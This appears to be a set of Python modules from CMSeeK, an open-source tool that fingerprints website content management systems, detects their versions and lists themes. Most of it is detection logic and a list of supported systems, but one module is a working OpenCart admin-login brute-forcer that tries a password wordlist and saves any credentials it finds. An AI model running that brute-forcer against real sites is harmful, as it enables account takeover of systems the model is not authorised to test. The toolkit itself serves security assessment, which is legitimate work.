        'ipo(pagetext|mainframe|footer|menuwrapper|copyright|header|main|menu|statistics):-ipo'
        ]
        for detection_key in page_source_detection_regex_keys:
            if ':-' in detection_key:
                detection_array = detection_key.split(':-')
                if '||' in detection_array[0]:
                    detection_regex_strings = detection_array[0].split('||')
                    for detection_regex_string in detection_regex_strings:
                        regex_match_status = re.search(detection_regex_string, page_source_code, re.DOTALL)
                        if regex_match_status != None and detection_array[1] not in cmseek.ignore_cms:
                            if cmseek.strict_cms == [] or detection_array[1] in cmseek.strict_cms:
                                return ['1', detection_array[1]]
                else:
                    regex_match_status = re.search(detection_array[0], page_source_code, re.DOTALL)
                    if regex_match_status != None and detection_array[1] not in cmseek.ignore_cms:
                        if cmseek.strict_cms == [] or detection_array[1] in cmseek.strict_cms:
                            return ['1', detection_array[1]]

        else:
            # Failure
            return ['0', 'na']



#!/usr/bin/python3
# -*- coding: utf-8 -*-
# This is a part of CMSeeK, check the LICENSE file for more information
# Copyright (c) 2018 - 2020 Tuhinshubhra

import cmseekdb.basic as cmseek
# I know there is no reason at all to create a separate module for this.. there's something that's going to be added here so.. trust me!
def start(source):
    # print(source)
    if 'Joomla! Debug Console' in source or 'xdebug.org/docs/all_settings' in source:
        cmseek.success('Debug mode on!')
        return '1'
    else:
        return '0'



#!/usr/bin/python3
# -*- coding: utf-8 -*-
# This is a part of CMSeeK, check the LICENSE file for more information
# Copyright (c) 2018 Tuhinshubhra

# Oracle ATG version detection
# Rev 1

import cmseekdb.basic as cmseek
import re
from base64 import b64decode


def start(headers):
    cmseek.statement('Detecting version using atg_version [Method 1 of 1]')
    try:
        encoded_version = re.search('X-ATG-Version: version=(.+)', headers).group(1)
        version = b64decode(encoded_version).decode('utf-8')
        version = re.search('ATGPlatform\/([\d\.]+)', version).group(1)
    except:
        version = None

    if version:
        cmseek.success('Oracle ATG version ' + cmseek.bold + version + cmseek.cln + ' detected')
    else:
        cmseek.error('Oracle ATG version detection failed!')
        version = '0'

    return version



#!/usr/bin/python3
# -*- coding: utf-8 -*-
# This is a part of CMSeeK, check the LICENSE file for more information
# Copyright (c) 2018 - 2020 Tuhinshubhra

# http://localhost/wordpress/wordpress/wp-login.php?action=register

import cmseekdb.basic as cmseek

def start(url,ua):
    reg_url = url + '/wp-login.php?action=register'
    cmseek.info('Checking user registration status')
    reg_source = cmseek.getsource(reg_url, ua)
    reg_status = '0'
    if reg_source[0] == '1' and '<form' in reg_source[1]:
        if 'Registration confirmation will be emailed to you' in reg_source[1] or 'value="Register"' in reg_source[1] or 'id="user_email"' in reg_source[1]:
            cmseek.success('User registration open: ' + cmseek.bold + cmseek.fgreen + reg_url + cmseek.cln)
            reg_status = '1'
    return [reg_status, reg_url]



#!/usr/bin/python3
# -*- coding: utf-8 -*-
# This is a part of CMSeeK, check the LICENSE file for more information
# Copyright (c) 2018 - 2020 Tuhinshubhra

# sNews version detection
# Rev 1

import cmseekdb.basic as cmseek
import re

def start(ga_content,source):
    regex = re.findall(r'sNews (.*)', ga_content)
    if regex != []:
        version = regex[0]
        cmseek.success('sNews version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected')
        return version
    else:
        regex = re.findall(r'sNews (.*?)"', source)
        if regex != []:
            version = regex[0]
            cmseek.success('sNews version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected')
            return version
        else:
            cmseek.error('Version detection failed!')
            return '0'



#!/usr/bin/python3
# -*- coding: utf-8 -*-
# This is a part of CMSeeK, check the LICENSE file for more information
# Copyright (c) 2018 - 2020 Tuhinshubhra

# OpenCms Version detection
# Rev 1
import cmseekdb.basic as cmseek
import re

def start(url, ua):
    kurama = cmseek.getsource(url, ua)
    header = kurama[2].split('\n')
    regex = []
    for tail in header:
        if 'Server' in tail and 'OpenCms' in tail:
            regex = re.findall(r'Server: OpenCms/(.*)', tail)
    if regex != []:
        cmseek.success('OpenCms version ' + cmseek.bold + cmseek.fgreen + regex[0] + cmseek.cln + ' detected')
        return regex[0]
    else:
        cmseek.error('Version detection failed!')
        return '0'



#!/usr/bin/python3
# -*- coding: utf-8 -*-
# This is a part of CMSeeK, check the LICENSE file for more information
# Copyright (c) 2018 - 2020 Tuhinshubhra

# FlexCMP version detection
# Rev 1

import cmseekdb.basic as cmseek
import re

def start(source, url, ua):
    regex = re.findall(r'<!--.*-->', source, re.DOTALL)
    if regex != []:
        for r in regex:
            if 'FlexCMP' in r and 'v.' in r:
                tmp = r.split('\n')
                for t in tmp:
                    if 'v.' in t:
                        kek = re.findall(r'v. (.*?) -', t)
                        if kek != []:
                            # coding this was actually fun idk why ;--;
                            version = kek[0]
                            cmseek.success('FlexCMP version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected from source')
                            return version
    else:
        kurama = cmseek.getsource(url, ua)
        header = kurama[2].split('\n')
        regex = []
        for tail in header:
            if 'X-Powered-By' in tail and 'FlexCMP' in tail:
                regex = re.findall(r'X-Powered-By: FlexCMP Application Server \[v\. (.*?) - ', tail)
        if regex != []:
            cmseek.success('FlexCMP version ' + cmseek.bold + cmseek.fgreen + regex[0] + cmseek.cln + ' detected from header')
            return regex[0]
        else:
            cmseek.error('Version detection failed!')
            return '0'



#!/usr/bin/python3
# -*- coding: utf-8 -*-
# This is a part of CMSeeK, check the LICENSE file for more information
# Copyright (c) 2018 - 2020 Tuhinshubhra

# Magento version detection
# Rev 1
import cmseekdb.basic as cmseek
import re
def start(url, ua):
    # Detect version via magento_version (not very accurate)
    cmseek.statement('Detecting version using magento_version [Method 1 of 1]')
    magento_version = url + '/magento_version'
    changelog_source = cmseek.getsource(magento_version, ua)
    if changelog_source[0] == '1' and 'Magento' in changelog_source[1]:
        cl_array = changelog_source[1].split('/')
        if cl_array != []:
            cmseek.success('Magento version ' + cmseek.bold + cl_array[1] + cmseek.cln + ' detected')
            return cl_array[1]
        cmseek.error('Magento version detection failed!')
        return '0'
    else:
        cmseek.error('Magento version detection failed!')
        return '0'


#!/usr/bin/python3
# -*- coding: utf-8 -*-
# This is a part of CMSeeK, check the LICENSE file for more information
# Copyright (c) 2018 - 2020 Tuhinshubhra

## TiddlyWiki version detection
## Rev 1

import re
import cmseekdb.basic as cmseek

def start(source):
    version = '0'
    if 'major:' in source and 'minor:' in source and 'revision:' in source:
        major = re.findall(r'major: (.*?),',source)
        minor = re.findall(r'minor: (.*?),',source)
        rev = re.findall(r'revision: (.*?),',source)
        if major != [] and minor != [] and rev != []:
            version = major[0] + '.' + minor[0] + '.' + rev[0]
            cmseek.success('TiddlyWiki version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected!')
        else:
            cmseek.warning('Version detection failed!')
    else:
        cmseek.warning('Version detection failed!')
    return version



#!/usr/bin/python3
# -*- coding: utf-8 -*-
# This is a part of CMSeeK, check the LICENSE file for more information
# Copyright (c) 2023 hackzard

# Detect cms using directory (modules) checks
# Rev 1
import re
import cmseekdb.basic as cmseek
def check(url, ua):
    directories = ["/manager/", "/admin/", "/about/"]
    # check for modules directory
    for directory in directories:
            directory = url.rstrip('/') + directory
            page_source = cmseek.getsource(directory, ua)
            if page_source[0] == '1' and page_source[1] != '':
                # Check begins here
                page_content = page_source[1]
                #### START DETECTION FROM HERE
                ## || <- if either of it matches cms detected
                ## :::: <- all the strings has to match (implemented to decrease false positives)
                directory_detection_keys = [
                'http://modx.com||MODX CMF Manager Login||/MODxRE/:-modx',
                'SilverStripe:-sst',
                'bitrix||Bitrix:-bitrix'
                ]
                for detection_key in directory_detection_keys:
                    if ':-' in detection_key:
                        detection_array = detection_key.split(':-')
                        if '||' in detection_array[0]:
                            detection_strings = detection_array[0].split('||')
                            for detection_string in detection_strings:
                                if detection_string in page_content and detection_array[1] not in cmseek.ignore_cms:
                                    if cmseek.strict_cms == [] or detection_array[1] in cmseek.strict_cms:
                                        return ['1', detection_array[1]]
                        elif '::::' in detection_array[0]:
                            match_status = '0' # 0 = neutral, 1 = passed, 2 = failed
                            match_strings = detection_array[0].split('::::')
                            for match_string in match_strings:
                                if match_status == '0' or match_status == '1':
                                    if match_string in page_content:
                                        match_status = '1'
                                    else:
                                        match_status = '2'
                                else:
                                    match_status = '2'
                            if match_status == '1' and detection_array[1] not in cmseek.ignore_cms:
                                if cmseek.strict_cms == [] or detection_array[1] in cmseek.strict_cms:
                                    return ['1', detection_array[1]]
                        else:
                            if detection_array[0] in page_content and detection_array[1] not in cmseek.ignore_cms:
                                if cmseek.strict_cms == [] or detection_array[1] in cmseek.strict_cms:
                                    return ['1', detection_array[1]]
    else:
        cmseek.error('Unable to detect CMS even by directory (modules) checks!')
        return ['0','']



#!/usr/bin/python3
# -*- coding: utf-8 -*-
# This is a part of CMSeeK, check the LICENSE file for more information
# Copyright (c) 2018 - 2020 Tuhinshubhra

def start(id, url, ua, ga, source, ga_content, detection_method='', headers=''):
    if id == "wp":
        # for now this is the only cms... but not for long!
        import deepscans.wp.init as wpscan
        wpscan.start(id, url, ua, ga, source, detection_method)
    if id == 'joom':
        # told ya... not for long
        import deepscans.joom.init as joomscan
        joomscan.start(id, url, ua, ga, source)
    if id == 'umbraco':
        # umm... whatever
        import deepscans.umbraco.init as umbracoscan
        umbracoscan.start(id, url, ua, ga, source, detection_method, headers)



#!/usr/bin/python3
# -*- coding: utf-8 -*-
# This is a part of CMSeeK, check the LICENSE file for more information
# Copyright (c) 2018 - 2020 Tuhinshubhra
### OpenCart Bruteforce module
### Version 1.0
### cmseekbruteforcemodule <- make sure you include this comment in any custom modules you create so that cmseek can recognize it as a part of it's module

import cmseekdb.basic as cmseek
import cmseekdb.sc as source # Contains function to detect cms from source code
import cmseekdb.header as header # Contains function to detect CMS from gathered http headers
import multiprocessing ## Let's speed things up a lil bit (actually a hell lot faster) shell we?
from functools import partial ## needed somewhere :/
import sys
import cmseekdb.generator as generator
import urllib.request


def testlogin(url,user,passw,):
    url = url + '/admin/index.php'
    ua = cmseek.randomua('generatenewuaeverytimetobesafeiguess')
    try:
        ckreq = urllib.request.Request(
        url,
        data=urllib.parse.urlencode({'username':user, 'password':passw}).encode("utf-8"),
        headers={
            'User-Agent': ua
        }
        )
        with urllib.request.urlopen(ckreq, timeout=4) as response:
            scode = response.read().decode()
            headers = str(response.info())
            rurl = response.geturl()
            r = ['1', scode, headers, rurl] ## 'success code', 'source code', 'http headers'
            return r
    except Exception as e:
        e = str(e)
        r = ['2', e, '', ''] ## 'error code', 'error message', 'empty'
        return r
    print('hola')


def start():
    cmseek.clearscreen()
    cmseek.banner("OpenCart Bruteforce Module")
    url = cmseek.targetinp("") # input('Enter Url: ')
    cmseek.info("Checking for OpenCart")
    bsrc = cmseek.getsource(url, cmseek.randomua('foodislove'))
    if bsrc[0] != '1':
        cmseek.error("Could not get target source, CMSeek is quitting")
        cmseek.handle_quit()
    else:
        ## Parse generator meta tag
        parse_generator = generator.parse(bsrc[1])
        ga = parse_generator[0]
        ga_content = parse_generator[1]

        try1 = generator.scan(ga_content)
        if try1[0] == '1' and try1[1] == 'oc':
            occnf = '1'
        else:
            try2 = source.check(bsrc[1], url)
            if try2[0] == '1' and try2[1] == 'oc':
                occnf = '1'
            else:
                occnf = '0'
    if occnf != '1':
        cmseek.error('Could not confirm OpenCart... CMSeek is quitting')
        cmseek.handle_quit()
    else:
        cmseek.success("OpenCart Confirmed... Checking for OpenCart login form")
        ocloginsrc = cmseek.getsource(url + '/admin/index.php', cmseek.randomua('thatsprettygay'))
        if ocloginsrc[0] == '1' and '<form' in ocloginsrc[1] and 'route=common/login' in ocloginsrc[1]:
            cmseek.success("Login form found!")
            ocparamuser = ['']
            rawuser = input("[~] Enter Usernames with coma as separation without any space (example: cris,harry): ").split(',')
            for rusr in rawuser:
                ocparamuser.append(rusr)
            ocbruteusers = set(ocparamuser) ## Strip duplicate usernames

            for user in ocbruteusers:
                if user != '':
                    passfound = '0'
                    print('\n')
                    cmseek.info("Bruteforcing User: " + cmseek.bold + user + cmseek.cln)
                    with open("wordlist/passwords.txt", "r") as pwd_file:
                        passwords = pwd_file.read().split('\n')
                    passwords.insert(0, user)
                    for password in passwords:
                        if password != '' and password != '\n':
                            sys.stdout.write('[*] Testing Password: ')
                            sys.stdout.write('%s\r\r' % password)
                            sys.stdout.flush()
                            cursrc = testlogin(url, user, password)
                            if 'route=common/dashboard&user_token=' in str(cursrc[3]):
                                cmseek.success('Password found!')
                                print(" |\n |--[username]--> " + cmseek.bold + user + cmseek.cln + "\n |\n |--[password]--> " + cmseek.bold + password + cmseek.cln + "\n |")
                                cmseek.success('Enjoy The Hunt!')
                                cmseek.savebrute(url,url + '/admin/index.php',user,password)
                                passfound = '1'
                                break
                            else:
                                continue
                            break
                    if passfound == '0':
                        cmseek.error('\n\nCould Not find Password!')
                    print('\n\n')

        else:
            cmseek.error("Couldn't find login form... CMSeeK is quitting")
            cmseek.handle_quit()



#!/usr/bin/python3
# -*- coding: utf-8 -*-
# This is a part of CMSeeK, check the LICENSE file for more information
# Copyright (c) 2018 - 2020 Tuhinshubhra

# OpenText WSM version detection
# Rev 1

import cmseekdb.basic as cmseek
import re

def start(source):
    source = source.lower()
    regex = re.findall(r'published by open text web solutions (.*?) -->', source)
    if regex != []:
        version = regex[0]
        if '-' in version:
            version = version.split('-')
            version = version[1].replace(' ', '')
        cmseek.success('OpenText WSM version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected')
        return version
    else:
        cmseek.error('Version detection failed!')
        return '0'



#!/usr/bin/python3
# -*- coding: utf-8 -*-
# This is a part of CMSeeK, check the LICENSE file for more information
# Copyright (c) 2018 - 2020 Tuhinshubhra

# Commerce Server version detection
# Rev 1

import cmseekdb.basic as cmseek
import re

def start(url, ua):
    cmseek.statement('Detecting Commerce Server using headers [Method 1 of 1]')
    kurama = cmseek.getsource(url, ua)
    header = kurama[2].split('\n')
    regex = []
    for tail in header:
        if 'commerce-server-software:' in tail.lower():
            regex = re.findall(r'commerce-server-software: (.*)', tail, re.IGNORECASE)
    if regex != [] and regex[0] != "":
        cmseek.success('Commerce Server version ' + cmseek.bold + cmseek.fgreen + regex[0] + cmseek.cln + ' detected')
        return regex[0]
    else:
        cmseek.error('Version detection failed!')
        return '0'



#!/usr/bin/python3
# -*- coding: utf-8 -*-
# This is a part of CMSeeK, check the LICENSE file for more information
# Copyright (c) 2018 - 2020 Tuhinshubhra

# Mura CMS version detection
# Rev 1

import cmseekdb.basic as cmseek
import re

def start(ga_content):
    regex = re.findall(r'Mura CMS (.*)', ga_content)
    if regex != []:
        version = regex[0]
        cmseek.success('Mura CMS version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected')
        return version
    else:
        cmseek.error('Version detection failed!')
        return '0'



#!/usr/bin/python3
# -*- coding: utf-8 -*-
# This is a part of CMSeeK, check the LICENSE file for more information
# Copyright (c) 2018 - 2020 Tuhinshubhra

import os
import json
import datetime
import cmseekdb.basic as cmseek
import logging, traceback

def init(cmseek_dir, report_dir=""):
    '''
    Creates/Updates result index
    Needed Parameters:
    cmseek_dir = CMSeeK directory / access_directory
    report_dir = path to report directory leave empty if default
    '''
    # Create a json list of all the sites scanned and save it to <cmseek_dir>/reports.json
    cmseek.info('Updating CMSeeK result index...')
    if os.path.isdir(cmseek_dir):
        index_file = os.path.join(cmseek_dir, 'reports.json')
        if report_dir == "":
            report_dir = os.path.join(cmseek_dir, 'Result')
        if os.path.isdir(report_dir):
            result_index = {}
            result_dirs = os.listdir(report_dir)
            for result_dir in result_dirs:
                scan_file = os.path.join(report_dir, result_dir, 'cms.json')
                if os.path.isfile(scan_file):
                    try:
                        with open(scan_file, 'r', encoding='utf8') as sf:
                            scan_content = json.loads(sf.read())
                        scan_url = scan_content['url']
                        result_index[scan_url] = {"cms_id": scan_content['cms_id'],"date": scan_content['last_scanned'],"report":scan_file}
                    except Exception as e:
                        logging.error(traceback.format_exc())
                        cmseek.statement('Skipping invalid CMSeeK result: ' + scan_file)
            # Write index
            result_index = {"last_updated":str(datetime.datetime.now()), "results":[result_index]}
            with open(index_file, 'w+') as inf:
                inf.write(json.dumps(result_index, sort_keys=False, indent=4))
            cmseek.success('Report index updated successfully!')
            cmseek.report_index = result_index
            return ['1', 'Report index updated successfully!']

        else:
            cmseek.error('Result directory does not exist!')
            return [0, 'Result directory does not exist']

    else:
        cmseek.error('Invalid CMSeeK directory passed!')
        return [0, 'CMSeeK directory does not exist']



#!/usr/bin/python3
# -*- coding: utf-8 -*-
# This is a part of CMSeeK, check the LICENSE file for more information
# Copyright (c) 2018 - 2020 Tuhinshubhra

import cmseekdb.basic as cmseek
import re

def start(source,url,ua):
    cmseek.info('Starting passive theme enumeration')
    ## plug_file = open('database/themes.json', 'r')
    ## plug_data = plug_file.read()
    ## plug_json = json.loads(plug_data)
    plug_regex = re.compile('wp-content/themes/([^/]+)/.+ver=([0-9\.]+)')
    results = plug_regex.findall(source)
    themes = []
    found = 0
    for result in results:
        # found += 1
        name = result[0].replace('-master','').replace('.min','')
        nc = name + ":"
        if nc not in str(themes):
            version = result[1]
            each_theme = name + ":" + version + "|"
            # look if theme zip available
            cmseek.statement('Looking for theme zip file!')
            theme_zip = url + '/wp-content/themes/' + name + '.zip'
            zip_status = cmseek.check_url(theme_zip, ua)
            if zip_status == '1':
                cmseek.success('Current theme can be downloaded, URL: ' + cmseek.bold + theme_zip + cmseek.cln)
                each_theme += '/wp-content/themes/' + name + '.zip'
            themes.append(each_theme)
    themes = set(themes)
    found = len(themes)
    if found > 0:
        if found == 1:
            cmseek.success(cmseek.bold + cmseek.fgreen + str(found) + " theme detected!")
        else:
            cmseek.success(cmseek.bold + cmseek.fgreen + str(found) + " themes detected!")
    else:
        cmseek.error('Could not detect theme!')
    return [found, themes]



#!/usr/bin/python3
# -*- coding: utf-8 -*-
# This is a part of CMSeeK, check the LICENSE file for more information
# Copyright (c) 2018 - 2020 Tuhinshubhra

# This file contains the list of cmss supported by CMSeeK in the following structure
# ExampleCMS = {
#'name':'Example CMS',
#'url':'https://examplecms.com',
#'vd':'true',
#'deeps':'false'
#}

# vd determines if CMSeek can detect the version of the CMS and deeps determines if there's a deepscan available for the cms

wp = {
    'name':'WordPress',
    'url':'https://wordpress.org',
    'vd':'1',
    'deeps':'1'
}

tilda = {
    'name':'Tilda CMS',
    'url':'https://tilda.cc/',
    'vd':'0',
    'deeps':'0'
}

mg = {
    'name':'Magento',
    'url':'https://magento.com',
    'vd':'1',
    'deeps':'0'
}

blg = {
    'name':'Blogger By Google',
    'url':'https://blogger.com',
    'vd':'0',
    'deeps':'0'
}

ghost = {
    'name':'Ghost CMS',
    'url':'https://ghost.org',
    'vd':'0',
    'deeps':'0'
}

lj = {
    'name':'LiveJournal',
    'url':'https://livejournal.com',
    'vd':'0',
    'deeps':'0'
}

tdc = {
    'name':'3dCart',
    'url':'https://3dcart.com',
    'vd':'0',
    'deeps':'0'
}

amcms = {
    'name':'Ametys CMS',
    'url':'https://ametys.org',
    'vd':'0',
    'deeps':'0'
}

apos = {
    'name':'Apostrophe CMS',
    'url':'https://apostrophecms.org',
    'vd':'0',
    'deeps':'0'
}

asciid = {
    'name':'AsciiDoc',
    'url':'https://methods.co.nz',
    'vd':'0',
    'deeps':'0'
}

dru = {
    'name':'Drupal',
    'url':'https://drupal.org',
    'vd':'1',
    'deeps':'0'
}

zyro = {
    'name':'Zyro',
    'url':'https://zyro.com/',
    'vd':'0',
    'deeps':'0'
}

bolt = {
    'name':'Bolt',
    'url':'https://bolt.com',
    'vd':'0',
    'deeps':'0'
}

brcms = {
    'name':'BrowserCMS',
    'url':'https://browsercms.com',
    'vd':'1',
    'deeps':'0'
}

bubble = {
    'name':'Bubble',
    'url':'https://bubble.is',
    'vd':'0',
    'deeps':'0'
}

abc = {
    'name':'Adobe Business Catalyst',
    'url':'https://businesscatalyst.com',
    'vd':'0',
    'deeps':'0'
}

ckan = {
    'name':'CKAN',
    'url':'https://ckan.org',
    'vd':'0',
    'deeps':'0'
}

cmds = {
    'name':'CMS Made Simple',
    'url':'https://cmsmadesimple.org',
    'vd':'0',
    'deeps':'0'
}

csim = {
    'name':'CMSimple',
    'url':'https://cmssimple.org',
    'vd':'1',
    'deeps':'0'
}

xe = {
    'name':'XpressEngine',
    'url':'https://xpressengine.com',
    'vd':'1',
    'deeps':'0'
}

tp3 = {
    'name':'TYPO3 CMS',
    'url':'https://typo3.org',
    'vd':'0',
    'deeps':'0'
}

tpc = {
    'name':'Textpattern CMS',
    'url':'https://textpattern.com',
    'vd':'0',
    'deeps':'0'
}

joom = {
    'name':'Joomla',
    'url':'https://joomla.org',
    'vd':'1',
    'deeps':'1'
}
oc = {
    'name':'OpenCart',
    'url':'https://www.opencart.com',
    'vd':'0',
    'deeps':'0'
}
xoops = {
    'name':'XOOPS',
    'url':'http://xoops.org',
    'vd':'0',
    'deeps':'0'
}
ushahidi = {
    'name':'Ushahidi',
    'url':'http://www.ushahidi.com',
    'vd':'0',
    'deeps':'0'
}
umi = {
    'name':'UMI.CMS',
    'url':'https://www.umi-cms.ru',
    'vd':'1',
    'deeps':'0'
}
tiki = {
    'name':'Tiki Wiki CMS Groupware',
    'url':'http://tiki.org',
    'vd':'0',
    'deeps':'0'
}
wolf = {
    'name':'Wolf CMS',
    'url':'http://www.wolfcms.org',
    'vd':'0',
    'deeps':'0'
}
wix = {
    'name':'WIX Website Builder',
    'url':'http://wix.com',
    'vd':'0',
    'deeps':'0'
}
wb = {
    'name':'WebsiteBaker CMS',
    'url':'https://websitebaker.org/',
    'vd':'0',
    'deeps':'0'
}
wgui = {
    'name':'WebGUI',
    'url':'http://www.webgui.org',
    'vd':'1',
    'deeps':'0'
}
tidw = {
    'name':'TiddlyWiki',
    'url':'https://tiddlywiki.com/',
    'vd':'1',
    'deeps':'0'
}
sulu = {
    'name':'SULU',
    'url':'https://sulu.io/',
    'vd':'1',
    'deeps':'0'
}
subcms = {
    'name':'Subrion CMS',
    'url':'https://subrion.org/',
    'vd':'1',
    'deeps':'0'
}
sqm = {
    'name':'Squiz Matrix',
    'url':'https://www.squiz.net/technology/cms',
    'vd':'0',
    'deeps':'0'
}
spin = {
    'name':'Spin CMS',
    'url':'https://www.spin.cw/',
    'vd':'0',
    'deeps':'0'
}
sdev = {
    'name':'solodev',
    'url':'https://www.solodev.com/',
    'vd':'0',
    'deeps':'0'
}
snews = {
    'name':'sNews',
    'url':'https://snewscms.com/',
    'vd':'1',
    'deeps':'0'
}
score = {
    'name':'Sitecore',
    'url':'https://www.sitecore.com/',
    'vd':'0',
    'deeps':'0'
}
sim = {
    'name':'SIMsite',
    'url':'https://simgroep.nl/',
    'vd':'0',
    'deeps':'0'
}
spb = {
    'name':'Simplébo',
    'url':'https://www.simplebo.fr',
    'vd':'0',
    'deeps':'0'
}
sst = {
    'name':'SilverStripe',
    'url':'https://www.silverstripe.org/',
    'vd':'0',
    'deeps':'0'
}
silva = {
    'name':'Silva CMS',
    'url':'http://infrae.com/products/silva',
    'vd':'0',
    'deeps':'0'
}
dle = {
    'name':'DataLife Engine',
    'url':'https://dle-news.com',
    'vd':'0',
    'deeps':'0'
}
spity = {
    'name':'Serendipity',
    'url':'https://docs.s9y.org/',
    'vd':'1',
    'deeps':'0'
}
rcube = {
    'name':'RoundCube Webmail',
    'url':'https://roundcube.net/',
    'vd':'0',
    'deeps':'0'
}
slcms = {
    'name':'SeamlessCMS',
    'url':'https://www.seamlesscms.com/',
    'vd':'1',
    'deeps':'0'
}
rock = {
    'name':'Rock RMS',
    'url':'https://www.rockrms.com/',
    'vd':'1',
    'deeps':'0'
}
roadz = {
    'name':'Roadiz CMS',
    'url':'https://www.roadiz.io/',
    'vd':'1',
    'deeps':'0'
}
rite = {
    'name':'RiteCMS',
    'url':'http://ritecms.com/',
    'vd':'1',
    'deeps':'0'
}
rcms = {
    'name':'RCMS',
    'url':'https://www.reallycms.fi/',
    'vd':'0',
    'deeps':'0'
}
quick = {
    'name':'Quick.Cms',
    'url':'https://opensolution.org/cms-system-quick-cms.html',
    'vd':'1',
    'deeps':'0'
}
pcore = {
    'name':'Pimcore',
    'url':'https://pimcore.com/',
    'vd':'0',
    'deeps':'0'
}
pwind = {
    'name':'phpWind',
    'url':'https://www.phpwind.com/',
    'vd':'1',
    'deeps':'0'
}
phpc = {
    'name':'phpCMS',
    'url':'http://www.phpcms.cn/',
    'vd':'0',
    'deeps':'0'
}
percms = {
    'name':'Percussion CMS',
    'url':'https://www.percussion.com/',
    'vd':'0',
    'deeps':'0'
}
pblue = {
    'name':'PencilBlue',
    'url':'http://pencilblue.org',
    'vd':'0',
    'deeps':'0'
}
ophal =  {
    'name':'Ophal',
    'url':'http://ophal.org',
    'vd':'1',
    'deeps':'0'
}
sfy =  {
    'name':'Sitefinity',
    'url':'https://www.sitefinity.com/',
    'vd':'1',
    'deeps':'0'
}
otwsm = {
    'name':'OpenText WSM',
    'url':'http://www.opentext.com/',
    'vd':'1',
    'deeps':'0'
}
ocms = {
    'name':'OpenCms',
    'url':'http://www.opencms.org/',
    'vd':'1',
    'deeps':'0'
}
odoo = {
    'name':'Odoo',
    'url':'https://www.odoo.com/',
    'vd':'0',
    'deeps':'0'
}
share = {
    'name':'Microsoft Sharepoint',
    'url':'https://sharepoint.com',
    'vd':'1',
    'deeps':'0'
}
octcms = {
    'name':'October CMS',
    'url':'https://octobercms.com/',
    'vd':'0',
    'deeps':'0'
}
mura = {
    'name':'Mura CMS',
    'url':'http://www.getmura.com/',
    'vd':'1',
    'deeps':'0'
}

moto = {
    'name':'Moto CMS',
    'url':'https://www.motocms.com/',
    'vd':'0',
    'deeps':'0'
}

mnet = {
    'name':'Mono.net',
    'url':'https://mono.net',
    'vd':'0',
    'deeps':'0'
}

modx = {
    'name':'MODX',
    'url':'https://modx.com/',
    'vd':'0',
    'deeps':'0'
}

methd = {
    'name':'Methode',
    'url':'https://www.eidosmedia.com',
    'vd':'0',
    'deeps':'0'
}

mambo = {
    'name':'Mambo',
    'url':'http://mambo-foundation.org',
    'vd':'0',
    'deeps':'0'
}

lscms = {
    'name':'LiveStreet CMS',
    'url':'http://livestreetcms.com/',
    'vd':'0',
    'deeps':'0'
}

lepton = {
    'name':'LEPTON CMS',
    'url':'https://lepton-cms.org/',
    'vd':'0',
    'deeps':'0'
}

kbcms = {
    'name':'Kooboo CMS',
    'url':'https://www.kooboo.com/',
    'vd':'1',
    'deeps':'0'
}

koken = {
    'name':'Koken',
    'url':'http://koken.me',
    'vd':'1',
    'deeps':'0'
}

jimdo = {
    'name':'Jimdo',
    'url':'https://www.jimdo.com/',
    'vd':'0',
    'deeps':'0'
}

ibit = {
    'name':'Indexhibit',
    'url':'http://www.indexhibit.org/',
    'vd':'0',
    'deeps':'0'
}

wflow = {
    'name':'Webflow CMS',
    'url':'https://webflow.com/',
    'vd':'0',
    'deeps':'0'
}

jcms = {
    'name':'Jalios JCMS',
    'url':'http://www.jalios.com/',
    'vd':'0',
    'deeps':'0'
}
impage = {
    'name':'ImpressPages CMS',
    'url':'https://www.impresspages.org/',
    'vd':'1',
    'deeps':'0'
}
hotaru = {
    'name':'Hotaru CMS',
    'url':'http://hotarucms.org/',
    'vd':'0',
    'deeps':'0'
}
hippo = {
    'name':'HIPPO CMS',
    'url':'https://www.onehippo.org/',
    'vd':'0',
    'deeps':'0'
}
grav = {
    'name':'GravCMS',
    'url':'https://getgrav.org/',
    'vd':'0',
    'deeps':'0'
}
gsimp = {
    'name':'GetSimple CMS',
    'url':'http://get-simple.info/',
    'vd':'0',
    'deeps':'0'
}
fork = {
    'name':'Fork CMS',
    'url':'https://www.fork-cms.com/',
    'vd':'0',
    'deeps':'0'
}
phpn = {
    'name':'PHP Nuke',
    'url':'https://www.phpnuke.org/',
    'vd':'0',
    'deeps':'0'
}
flex = {
    'name':'FlexCMP',
    'url':'https://www.flexcmp.com',
    'vd':'1',
    'deeps':'0'
}
ezpu = {
    'name':'eZ Publish',
    'url':'https://ez.no/',
    'vd':'0',
    'deeps':'0'
}
exen = {
    'name':'ExpressionEngine',
    'url':'https://expressionengine.com/',
    'vd':'0',
    'deeps':'0'
}
epis = {
    'name':'EPiServer',
    'url':'https://www.episerver.com/',
    'vd':'0',
    'deeps':'0'
}
e107 = {
    'name':'e107',
    'url':'https://e107.org/',
    'vd':'0',
    'deeps':'0'
}
dnn = {
    'name':'DNN Platform',
    'url':'http://www.dnnsoftware.com',
    'vd':'0',
    'deeps':'0'
}
phpbb = {
    'name':'phpBB',
    'url':'http://phpbb.com',
    'vd':'0',
    'deeps':'0'
}
dede = {
    'name':'DEDE CMS',
    'url':'http://dedecms.com/',
    'vd':'0',
    'deeps':'0'
}
dncms = {
    'name':'Danneo CMS',
    'url':'http://danneo.ru/',
    'vd':'1',
    'deeps':'0'
}
craft = {
    'name':'Craft CMS',
    'url':'https://craftcms.com/',
    'vd':'0',
    'deeps':'0'
}
dragon = {
    'name':'CPG Dragonfly',
    'url':'https://dragonflycms.org/',
    'vd':'0',
    'deeps':'0'
}
coton = {
    'name':'Cotonti',
    'url':'https://www.cotonti.com/',
    'vd':'0',
    'deeps':'0'
}
orchd = {
    'name':'Orchard CMS',
    'url':'https://orchardproject.net/',
    'vd':'0',
    'deeps':'0'
}
cbox = {
    'name':'ContentBox',
    'url':'https://www.contentboxcms.org/',
    'vd':'0',
    'deeps':'0'
}
conful = {
    'name':'Contentful',
    'url':'https://www.contentful.com/',
    'vd':'0',
    'deeps':'0'
}
cntsis = {
    'name':'Contensis CMS',
    'url':'https://zengenti.com/',
    'vd':'1',
    'deeps':'0'
}
cnido = {
    'name':'CMS CONTENIDO',
    'url':'https://www.contenido.org/',
    'vd':'1',
    'deeps':'0'
}
contao = {
    'name':'Contao CMS',
